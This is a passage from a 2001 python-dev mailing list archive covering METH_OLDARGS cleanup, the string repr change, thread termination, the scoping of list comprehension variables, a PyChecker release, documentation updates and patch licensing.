> for extending Idle (in extend.txt), but there appears to be no
> extend.py in Idle-0.8.
>
> Does anyone know how we can add extensions to Idle-0.8?
>
> Thanks in advance,
> David
> --
> http://mail.python.org/mailman/listinfo/python-list


From mwh at python.net  Tue May 29 10:00:42 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 29 May 2001 09:00:42 +0100 (BST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>
Message-ID: <Pine.SOL.4.33.0105290854520.24723-100000@yellow.csi.cam.ac.uk>

On Tue, 29 May 2001, Tim Peters wrote:

> [Martin]
> > I took a special look at METH_OLDARGS occurrences.
>
> [GregE]
> > Shouldn't all these be removed? I would have thought
> > list.append was the last one!
>
> I count 42 of them remaining, usually for 0-argument functions.

There are more than that; PyMethodDefs that don't put anything in that
slot in the source are METH_OLDARGS too, and there are quite a few of them
in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the
older modules - gl, rotor were easy to find).  There are also quite a lot
of functions that put literal zeros there, too.

So METH_OLDARGS is far from dead, sadly.

Cheers,
M.


From tim.one at home.com  Tue May 29 10:04:48 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 04:04:48 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBBKFAA.tim.one@home.com>

[from Monday, May 21, 2001 1:04 PM]

[Tim]
>> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

[Martin v. Loewis]
> Any reason why PyThreadState_GET isn't used there?

Perhaps somebody's shift key got jammed?

sure-don't-see-a-good-reason-ly y'rs  - tim


From thomas at xs4all.net  Tue May 29 11:52:01 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 29 May 2001 11:52:01 +0200
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
Message-ID: <20010529115201.J676@xs4all.nl>

Robin apparently ran into a real problem caused by the change in string
repr() semantics. Now, arguably this is his own stupid fault <wink> (and
indeed he argues that himself) but that doesn't mean we shouldn't take this
into account. We could, for instance, revert 2.1.1 to the old behaviour,
giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide
what the string repr() change really wanted was just for the REPL to print
it like this, in which case the displayhook should fix it, not string_repr.

Opinions ? Ping, IIRC, this was your proposal, so yours would be especially
valuable ;)

----- Forwarded message from Robin Becker <robin at jessikat.fsnet.co.uk> -----

Date: Tue, 29 May 2001 09:58:49 +0100
From: Robin Becker <robin at jessikat.fsnet.co.uk>
To: Thomas Wouters <thomas at xs4all.net>
Cc: python-list at python.org
Subject: Re: string repr in 2.1

In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters
<thomas at xs4all.net> writes
>On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote:
>> In article <slrn9h5m4o.1hk.scarblac at pino.selwerd.nl>, Remco Gerlich
>> <scarblac at pino.selwerd.nl> writes
>
>> >Since 2.1, string repr uses heximal escapes instead of octal ones.
>
>> yes I guess all those *nix tools that like octal should be whipped and
>> made to obey the malevolent dictator.
>
>Do you have tools you use to parse quoted (repr'd) Python strings that
>handle octal correctly, but don't handle \x and \n\r escape codes ? Which
>ones ? And were you aware that they were going to break sooner or later,
>just because someone can prefer 'readable' escape codes and feed it that
>instead ? :)
>
Yes I have such tools. One is called Acrobat Reader, another is
traditional sed and awk. My dos grep doesn't seem to like hex, I suppose
I must update it and all other tools. 
 
My C compiler understands octal and the newer ones do hex as well.

I can read octal and do arithmetic in it probably easier than hex. I
don't defend the octal representation it's just very widespread in the
older tools. Our usage of repr was probably stupid as clearly repr can
change. 

How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit
cdc! Oh woe is me! Where are the duo-decimal calculators of yore? 
-- 
Robin Becker


----- End forwarded message -----

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From akuchlin at mems-exchange.org  Tue May 29 16:04:37 2001
From: akuchlin at mems-exchange.org (Andrew Kuchling)
Date: Tue, 29 May 2001 10:04:37 -0400
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us> <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>
Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us>

On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote:
>  It looks like I never replied to this.  It's probably dropped off
>your radar, but I'd say the answer is that the files on parrot should
>be discarded sooner rather than later -- when we actually manage to

Done.  Out of paranoia about doing 'rm -rf' within www.python.org's
tree, the files aren't deleted; instead I just moved them to my home
directory on parrot.

--amk


From aahz at rahul.net  Tue May 29 17:47:13 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Tue, 29 May 2001 08:47:13 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com> from "Tim Peters" at May 28, 2001 09:49:29 PM
Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> [Aahz]
> > Futz.  *Now* it works.  <sigh>
> 
> Now *what* works?  The test case I posted, or the original test case you
> tried (which you didn't post)?

My original test case.  I didn't actually preserve it, so the code below
was my attempt to reconstruct it (but I think it's pretty close to the
test case I tried).  Don't worry, if I run into this again, I'll be
*much* more careful about preserving the evidence and fiddling with
variations; last time I just assumed it was pilot error.

from threading import Thread
import os

class Foo(Thread):
    def run(self):
        while 1:
            pass

f = Foo()
f.start()
os._exit(1)


From beazley at cs.uchicago.edu  Tue May 29 18:56:09 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall
seeing it), but I would like to throw out something that has been
bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list
comprehensions a lot.  In fact, I find myself using them in just about
every Python program I've been writing since switching to Python 2.0.
However, I've also been shooting myself in the foot a little more than
usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x"
is evaluated in the local scope (and replaces any previous binding
to "x" that might have existed outside the context of the list
comprehension).    Because of this, I have frequently found myself
debugging the following programming error:

   # Some loop
   for x in r:
       ...
       # bunch of statements
       ...
       s = [expr(x) for x in t]
       ...
       # Try to do something with x.
       # ???? What in the hell is wrong with my program ????
       ...

The main problem is that I conceptually tend to think of the list
comprehension as being some kind of list operator where the index name
is really one of the operands in some sense.  Because of this, it is
*VERY* easy to get in the habit of throwing list comprehensions all
over the place, each of which uses a common index name like x,i,j,
etc.  Of course, this works just fine until you forget that you're
also using x,i,j for some kind of loop variable someplace else :-).

Therefore, I'm wondering if it would make any sense to make the
iterator variables used inside of a list comprehension private in some
manner--either through name mangling or some other technique? For
example:

   s = [expr(x) for x in t]

would get expanded into something roughly like this:

   s = [ ]
   for _mangled_x in t:
       s.append(expr(_mangled_x))
   del _mangled_x

Just as an aside, I have never intentionally used the iterator
variable of a list comprehension after the operation has completed. I
was actually quite surprised with this behavior the first time I saw
it.  I suspect most other programmers would not anticipate this side
effect either.

Comments?

Cheers,

Dave


From nas at python.ca  Tue May 29 19:01:41 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once.  It took a while to figure out
the problem.  I'm not sure that we can change it now though.

  Neil


From skip at pobox.com  Tue May 29 21:03:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>


I pass this along in case anyone here has some ideas for Jeff about how to
workaround his problems with pyexpat.c.

Skip

-------------- next part --------------
An embedded message was scrubbed...
From: Jeff Rush <jrush at taupro.com>
Subject: [Stackless] Stackless for 2.1: Progress Report
Date: Tue, 29 May 2001 13:06:12 -0500
Size: 3437
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010529/6d6875ae/attachment.eml>

From gward at python.net  Tue May 29 23:21:55 2001
From: gward at python.net (Greg Ward)
Date: Tue, 29 May 2001 17:21:55 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529172155.A8737@gerg.ca>

On 29 May 2001, David Beazley said:
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner--either through name mangling or some other technique? For
> example:

Two ideas occur to me:
  * make the list comprehension a new scoping level, which of course
    is doable now that we have sensible scoping semantics.  Presumably
    the usual warning message about shadowing variables from an
    outer scope will apply; you'll still have the bug in your code,
    but at least Python will tell you about it

  * don't make list comprehensions a separate scope, but add a
    little trickery so that something *like* the "shadowing variable
    from an outer scope" message is emitted

Haven't really thought about backwards compatibility issues...

        Greg


From paulp at ActiveState.com  Tue May 29 23:55:03 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Tue, 29 May 2001 14:55:03 -0700
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
References: <20010529115201.J676@xs4all.nl>
Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com>

Thomas Wouters wrote:
> 
> Robin apparently ran into a real problem caused by the change in string
> repr() semantics. Now, arguably this is his own stupid fault <wink> (and
> indeed he argues that himself) but that doesn't mean we shouldn't take this
> into account. 

I think it is done now and it is better this way. The pain is over.
Reverting would hurt someone else again.

Displayhook should be used sparingly. One of the major virtues of the
REPL is that it behaves so much like standard Python.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From tim at digicool.com  Wed May 30 00:54:01 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 29 May 2001 18:54:01 -0400
Subject: [Python-Dev] Re: Time for the yearly list.append() panic
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEKACAAA.tim@digicool.com>

FYI, I checked in a variation (listobject.c) over the weekend.

Win9x is ultimately hopeless, but we can grow a list there to about 35M
elements now instead of crapping out at < 2M, and it's zippy the whole way
until death.

Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was
obvious very early there.  Now it's flat and fast until physical RAM is
exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize
points.

Fred kindly confirmed that Linux isn't hurt.  Its behavior looks the same as
the new Win2K behavior, except that the Linux hiccups are much briefer
(although still obvious when they occur).

time-for-the-yearly-list.append()-celebration-ly y'rs  - tim


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <3B145FC9.49813488@metaslash.com>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks for everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 07:31:01 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 01:31:01 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar
productions used in the Reference Manual.  Currently, only the lexical
productions in Chapter 2 of the manual have been converted to the new
markup and layout.  Please take a look and send comments to
doc-sig at python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in
yet, and there are some bugs in the implementation (both for HTML and
PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera
5.0b8, and Netscape Navigator 4.77.  Navigator is definately lagging
behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module,
with some small changes.


From tim.one at home.com  Wed May 30 07:51:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>

[Fred Drake]
> The development version of the documentation has been updated:
>
> 	http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual.  Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.  Please take a look and send comments to
> doc-sig at python.org; the first page containing these changes is at:
>
>     http://python.sourceforge.net/devel-docs/ref/identifiers.html
>
> The changes needed to implement the markup have not been checked in
> yet, and there are some bugs in the implementation (both for HTML and
> PDF), but this should make the productions easier to navigate.

Let me suggest starting with

    http://python.sourceforge.net/devel-docs/ref/integers.html

instead, and clicking on "digit" in the "hexdigit" production.  The problem
with the originally suggested page is that all the links point into the same
paragraph, so "nothing happens" when you click one.  But "digit" was the
cause of a bogus bug report, as the submitter didn't realize "digit" had
been defined earlier in the docs, and without something like these mondo
cool new links it's almost impossible to find cross-section production
definitions.

Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
node24.html page it refers to doesn't seem to exist.


From fdrake at acm.org  Wed May 30 07:53:23 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 01:53:23 -0400 (EDT)
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
	<LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
 > node24.html page it refers to doesn't seem to exist.

  That was the bug alluded to.  The digit* grouped with the
nonzerodigit also doesn't work, although the other two uses of digit
on that page (floating.html) work properly.  I'll investigate
tomorrow; just too tired tonight.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one at home.com  Wed May 30 09:47:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your
problems in all areas are too common for us to really help you by fixing
this one <wink>.

OK, I'm afraid the behavior follows from taking seriously the idea that
listcomps are syntactic sugar for a specific pattern of nested loops and
"if" tests.  That was done to make it explainable, and the correspondence is
indeed exact.  The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from?  You guessed it.  Look for it after the listcomp
finishes and it's gone:

>> globals().keys()
'__builtins__', '__name__', 'name', '__doc__']
>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent
loop nest.

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops;
or that it's not worth it either.  Note that "the iterator variables"
needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the
for-loop model.  So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or
to the "[]"?  Python doesn't have a problem with reusing a name as a for
target in nested loops (or in listcomps today).

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected
exception, and you're desperate to know what the control vrbl was bound to
at the time of death?  Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>

Or what about:

i = 12
def f():
    print i
    return [i for i in range(i)]
f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just
   senseless?

So long as the for-loop model is followed faithfully, nothing is hard to
explain or predict, and simply because there's nothing truly new.

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too <wink>.

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why:  "for" is a binding construct in
Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it.  But the day we explain a Python construct
in terms of a lambda transformation is the day Guido kills all of us <wink>.


From esr at thyrsus.com  Wed May 30 10:00:56 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 04:00:56 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <20010530040056.A27662@thyrsus.com>

Tim Peters <tim.one at home.com>:
> That's more like Haskell does it.  But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us <wink>.

They'll get *my* lambdas when they pry them from my cold, dead fingers <wink>,
but I find I don't have a strong opinion about how the scoping should work.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Experience should teach us to be most on our guard to protect liberty
when the government's purposes are beneficient...  The greatest dangers
to liberty lurk in insidious encroachment by men of zeal, well meaning
but without understanding."
	-- Supreme Court Justice Louis Brandeis


From thomas at xs4all.net  Wed May 30 13:14:24 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 30 May 2001 13:14:24 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700
References: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010530131424.Y690@xs4all.nl>

On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:

> OK, I'm un-withdrawing this patch.  Just had to get things
> straight with our lawyer. The patch is released under the
> following license (the X11 license with 4 extra paragraphs
> of disclaimers :):
> http://www.zoteca.com/opensource/LICENSE.txt

This raises an interesting point. Do we want separate pieces of the Python
distribution to have separate licences ? I'd point out that the zoteca
licence isn't mentioned on the OSI site as an Approved Licence, and that the
licence contains a copyright notice, but no clear statement whether it's
allowed to copy the licence other than together with the piece of software
it's distributed with.

The easiest solution would of course be for Itamar to get his boss/lawyers
to give us the right to relicence it under the PSF licence :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From jack at oratrix.nl  Wed May 30 14:26:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 30 May 2001 14:26:39 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> 
Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl>

> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:
> 
> > OK, I'm un-withdrawing this patch.  Just had to get things
> > straight with our lawyer. The patch is released under the
> > following license (the X11 license with 4 extra paragraphs
> > of disclaimers :):
> > http://www.zoteca.com/opensource/LICENSE.txt
>
> [...]
>
> The easiest solution would of course be for Itamar to get his boss/lawyers
> to give us the right to relicence it under the PSF licence :)

I think this is the only viable solution. If various parts of Python have 
different license agreements this may well be a reason for people not to use 
Python because the hassle of figuring out which pieces fit their own licensing 
policy.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From beazley at cs.uchicago.edu  Wed May 30 15:49:29 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Wed, 30 May 2001 08:49:29 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>

Tim Peters writes:
 > > Because of this, I have frequently found myself debugging the
 > > following programming error:
 > 
 > If "frequently" is "a little more than usual", then it sounds like your
 > problems in all areas are too common for us to really help you by fixing
 > this one <wink>.

I've probably been bitten by this about 5-10 times over the last few
months. I can also say that it's a real bugger to track down when it
happens.  Now while this may just be a user problem on my part (which
I can accept), I think there is a much deeper semantic problem with
the current implementation of list comprehensions.  Specifically, we
now have this really cool list construction technique that is, for all
practical purposes, an operator.  Yet, at the same time, this
"operator" has a really nasty side-effect of changing the values of
variables in the surrounding scope in a very unnatural and unexpected
way.

More generally, it's essentially the same behavior that you would get
if you wrote some code like this:

    a = expr(x,y)

and expr() went off and nuked the value of x, replacing it with
something completely different (note: I'm not talking about cases
where x might be mutable here).  Since you can write things like this

    a = [ 2*x for x in s]

it's easy to view the right hand side as being isolated in the same
way as a normal expression (where the name of the iteration variable
"x" is incidental--a throwaway if you will).

Maybe everyone else views list comprehensions as a series of
statements (the syntactic sugar for nested for-loop idea).  However,
if you look at how they can be used, it's completely different than
this.  Specifically, if I write something like this:

   a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into
the following sequence of statements:

   t1 = [ ]
   for x in s:
      t1.append(2*x)
   t2 = [ ]
   for x in t:
      t2.append(3*x)
   a = t1 + t2

 > 
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2
 > >>>
 > 

Hmmm. I didn't realize that you could even do this.    Yes, this would
definitely present a problem.   However, if list comprehensions were
modified not to assign any names in the current scope, it still
seems like this would work (in this case, "x" is already defined and
"x.i" is not creating a new name, but is setting an attribute on
something else).   Couldn't nested scopes be used to implement this
in some manner?

 > > ...
 > > Just as an aside, I have never intentionally used the iterator
 > > variable of a list comprehension after the operation has completed.
 > 
 > Not even in a debugger, when the operation has completed via unexpected
 > exception, and you're desperate to know what the control vrbl was bound to
 > at the time of death?  Or in an exception handler?
 > 

Nope.  I don't make programming mistakes---well, other than this one,
and well, all of those other ones :-).

 > Another principled model is possible, where
 > 
 >     [f(i) for i in whatever]
 > 
 > is treated like
 > 
 >     (lambda: [f(i) for i in whatever])()
 > 
 > >>> i = 12
 > >>> (lambda: [i**2 for i in range(4)])()
 > [0, 1, 4, 9]
 > >>> i
 > 12
 > >>>
 > 
 > That's more like Haskell does it.  But the day we explain a Python construct
 > in terms of a lambda transformation is the day Guido kills all of us <wink>.

Ah yes, well this is exactly the kind of behavior that seems most
natural to me.   It's also the behavior that everyone expected went I
went around to the various Python hackers in the department and asked
them about it yesterday.

I suppose I could just write this:

  a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by
the problem I've described.  I would certainly love to see a fix for
it (I would even volunteer to work on a prototype implementation if
there is interest). On the other hand, if no changes are deemed
necessary, we should at least try to better emphasize this behavior in the
documentation--perhaps encouraging people to use private names.  For
example:

   a = [_i*2 for _i in t]
   
(although, I have to say that this just looks like a gross hack--I'd
rather not have to resort to doing this).

Cheers,

Dave


From fdrake at acm.org  Wed May 30 16:03:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
	<15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
 > Maybe everyone else views list comprehensions as a series of
 > statements (the syntactic sugar for nested for-loop idea).  However,

  I certainly don't.  I know that that was used as part of the design
consideration, but it's not at all clear to me that this is
desirable.
  If I see code like this:

        x = 42
        L = [x**2 for x in range(2000)]
        print x

I think it should map to something like this from C++:

        int x = 42;
        int L[2000];

        for (int x = 0; x < 2000; ++x) {
            L[x] = x * x;
        }
        printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.

Tim sez:
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2

David:
 > Hmmm. I didn't realize that you could even do this.    Yes, this would
 > definitely present a problem.   However, if list comprehensions were

  I didn't realize this either.  I'm quite surprised by it, in fact,
though I understand (I think) why it works that way.  But was this
intentional?  It seems like pure evil to me!  I'd only expect it to
support bare names and sequence unpacking (with only bare names at the
"edge" of all nested unpackings).


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From gward at python.net  Wed May 30 16:36:30 2001
From: gward at python.net (Greg Ward)
Date: Wed, 30 May 2001 10:36:30 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use
list comps as much as you do.

I can completely sympathize with both your and Tim's point of view
here.  Both make perfect sense at the same time.  Hmmm.

"Do I contradict myself?
 Very well then I contradict myself,
